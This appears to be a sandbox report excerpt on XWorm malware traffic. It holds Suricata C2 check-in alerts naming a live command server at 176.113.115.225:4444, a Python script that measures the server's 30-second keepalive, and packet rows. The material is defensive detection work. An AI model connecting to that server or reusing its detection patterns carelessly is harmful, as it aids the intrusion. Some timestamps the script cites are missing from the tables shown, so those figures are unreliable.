2025-01-28T12:24:27.494814+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:27.497081+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:27.615955+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:27.619295+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:35.882836+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:37.643539+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:37.648693+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:37.765523+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:37.767213+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:37.909469+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:37.911386+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:42.925238+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:42.927266+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:43.047982+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:43.050094+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:53.035067+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:53.040631+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:53.157468+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
2025-01-28T12:24:53.159267+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.8 | 49705 | 176.113.115.225 | 4444 | TCP
2025-01-28T12:24:53.562775+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 176.113.115.225 | 4444 | 192.168.2.8 | 49705 | TCP
                                            2025-01-28T12:24:53.584201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:24:53.738401+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:24:53.897168+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:03.414632+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:03.416900+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:03.422945+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:03.424967+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:05.899412+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:10.488112+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:10.516865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:13.511614+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:13.513922+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:14.415618+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:14.418720+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:27.070180+01002858799ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:27.367080+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:27.369454+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:34.379297+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:34.383872+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:35.909409+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:41.599608+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:41.602344+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:43.064967+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:43.067711+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:45.661132+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:45.663000+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:25:58.523391+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:25:58.525437+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:01.175747+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:01.177247+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:02.217210+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.217544+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.217814+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.219550+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:02.431071+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:02.433315+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:05.920555+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:12.409871+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:12.412310+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:13.238106+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:13.239839+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:18.066460+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:18.411580+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:25.113128+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:25.122064+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:27.815842+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:27.819607+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:27.988143+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:27.991592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.110626+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.112229+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.408775+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.411007+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:28.676942+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:28.682056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:29.097432+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:29.099404+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:31.488902+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:31.490696+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:34.035130+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:34.039595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:35.928828+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:38.413379+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:38.414881+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:39.128239+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:39.135435+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:39.335986+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:39.339163+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:40.317484+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:40.319218+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.521752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.523712+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.642322+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.648494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.765402+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.767663+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:49.884171+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:49.887455+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:50.340712+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:50.343534+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:55.301255+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:55.303233+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:26:55.684756+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:26:55.686427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:01.425651+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:01.427397+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:05.948767+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.769231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.770870+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:06.891752+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:06.894142+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:14.425804+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:14.427797+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
                                            2025-01-28T12:27:15.926110+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1176.113.115.2254444192.168.2.849705TCP
                                            2025-01-28T12:27:15.927184+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.849705176.113.115.2254444TCP
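Two things in the alert table above are worth extracting rather than reading by eye. First, every alert has the same public endpoint on one side, 176.113.115.225:4444, which is the C2 the malware configuration also names. Second, most server-to-client alerts (SID 2852870) are answered by a client alert (SID 2852923) within a few milliseconds, but the ones at roughly :05.9 and :35.9 of each minute (12:24:35.88, 12:25:05.90, 12:25:35.91, 12:26:05.92, 12:26:35.93, 12:27:05.95) have no client alert following them, and they recur every 30 seconds. That is the server's keepalive, and its fixed period with millisecond jitter is the kind of feature a beaconing detector keys on. The script below is an added example, not Joe Sandbox or Suricata code: it takes a subset of the rows above (the report's own timestamps, rewritten as pipe-separated fields), identifies the C2 as the non-RFC 1918 side of the flow, counts alerts per SID, and measures the interval between unanswered server alerts. The one-second answer window is an assumption chosen for this trace.

```python
"""Pull the C2 endpoint and the server keepalive cadence out of Suricata alert rows.

Added example, not Joe Sandbox or Suricata code. ALERT_ROWS is a subset of the
alert table of this report, as pipe-separated fields in the column order:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
"""
from __future__ import annotations

import ipaddress
import statistics
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta

S_SIG = "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes"
C_SIG = "ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)"
P_SIG = "ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound"
C2 = "176.113.115.225 | 4444"    # C2 address and port from the report
HOST = "192.168.2.8 | 49705"     # sandbox host and its ephemeral port

# Constructed sample: timestamps and SIDs copied from the report's alert table,
# only the column separators were added.
ALERT_ROWS = "\n".join([
    f"2025-01-28T12:24:27.373556+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:24:27.375983+0100 | 2852923 | {C_SIG} | 1 | {HOST} | {C2} | TCP",
    f"2025-01-28T12:24:35.882836+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:24:37.643539+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:24:37.648693+0100 | 2852923 | {C_SIG} | 1 | {HOST} | {C2} | TCP",
    f"2025-01-28T12:25:05.899412+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:25:27.070180+0100 | 2858799 | {P_SIG} | 1 | {HOST} | {C2} | TCP",
    f"2025-01-28T12:25:27.367080+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:25:27.369454+0100 | 2852923 | {C_SIG} | 1 | {HOST} | {C2} | TCP",
    f"2025-01-28T12:25:35.909409+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:26:05.920555+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:26:35.928828+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
    f"2025-01-28T12:27:05.948767+0100 | 2852870 | {S_SIG} | 1 | {C2} | {HOST} | TCP",
])


@dataclass(frozen=True)
class Alert:
    ts: datetime
    sid: str
    signature: str
    severity: int
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def parse_rows(text: str) -> list[Alert]:
    """Split pipe-separated alert rows into Alert records, sorted by time."""
    alerts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, src, sport, dst, dport, proto = [f.strip() for f in line.split("|")]
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), sid, sig,
                            int(sev), src, int(sport), dst, int(dport), proto))
    return sorted(alerts, key=lambda a: a.ts)


def c2_endpoints(alerts: list[Alert]) -> set[str]:
    """The C2 is whichever side of each flow is not an RFC 1918 address."""
    found = set()
    for a in alerts:
        for ip, port in ((a.src, a.sport), (a.dst, a.dport)):
            if not ipaddress.ip_address(ip).is_private:
                found.add(f"{ip}:{port}")
    return found


def sid_counts(alerts: list[Alert]) -> Counter:
    return Counter(a.sid for a in alerts)


def unanswered_server_alerts(alerts: list[Alert], c2_ip: str, window: float = 1.0) -> list[datetime]:
    """Server->client alerts with no client->server alert within `window` seconds.

    Answered ones are the check-in exchanges (the client replies within
    milliseconds); the unanswered ones are the server's periodic pings.
    The 1 s window is an assumption for this trace, not a protocol constant.
    """
    win = timedelta(seconds=window)
    client_times = [a.ts for a in alerts if a.dst == c2_ip]
    return [a.ts for a in alerts
            if a.src == c2_ip and not any(a.ts < t <= a.ts + win for t in client_times)]


def beacon_interval(times: list[datetime]) -> tuple[float, float] | None:
    """Median gap between consecutive events and the spread (max - min) of the gaps."""
    if len(times) < 2:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return statistics.median(gaps), max(gaps) - min(gaps)


if __name__ == "__main__":
    alerts = parse_rows(ALERT_ROWS)
    (c2,) = c2_endpoints(alerts)
    print("C2 endpoint:", c2)
    for sid, n in sid_counts(alerts).most_common():
        print(f"SID {sid}: {n} alerts")
    pings = unanswered_server_alerts(alerts, c2.split(":")[0])
    median, spread = beacon_interval(pings)
    print(f"{len(pings)} unanswered server alerts, one every {median:.3f} s (spread {spread * 1000:.1f} ms)")
```

On this subset the script reports 176.113.115.225:4444 as the only C2 endpoint, nine server check-in alerts, three client replies, one PING, and six unanswered server alerts spaced 30.01 s apart with about 12 ms of spread. The same cadence is visible in the packet table that follows as the lone server-to-client segments at 12:23:35.884, 12:24:05.886, 12:24:35.882 and 12:25:05.899, so the result can be cross-checked against the raw flow before it is turned into a rule.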
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2025 12:23:13.674097061 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:13.678921938 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:13.679132938 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:13.935779095 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:13.940576077 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:26.807777882 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:26.812655926 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:27.023169041 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:27.069195986 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:27.307564974 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:27.312534094 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:35.884149075 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:35.928595066 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:39.678898096 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:39.684005976 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:39.893946886 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:39.909677982 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:39.914580107 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:52.554130077 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:52.559052944 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:52.769090891 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:23:52.773427010 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:23:52.778470039 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:05.428853035 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:05.433629036 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:05.664555073 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:05.666580915 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:05.671371937 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:05.886218071 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:05.928659916 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:18.303950071 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:18.308845997 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:18.527431965 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:18.529866934 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:18.534707069 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:21.413450003 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:21.418262959 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:21.444650888 CET | 49705 | 4444 | 192.168.2.8 | 176.113.115.225
Jan 28, 2025 12:24:21.449661016 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
Jan 28, 2025 12:24:21.628137112 CET | 4444 | 49705 | 176.113.115.225 | 192.168.2.8
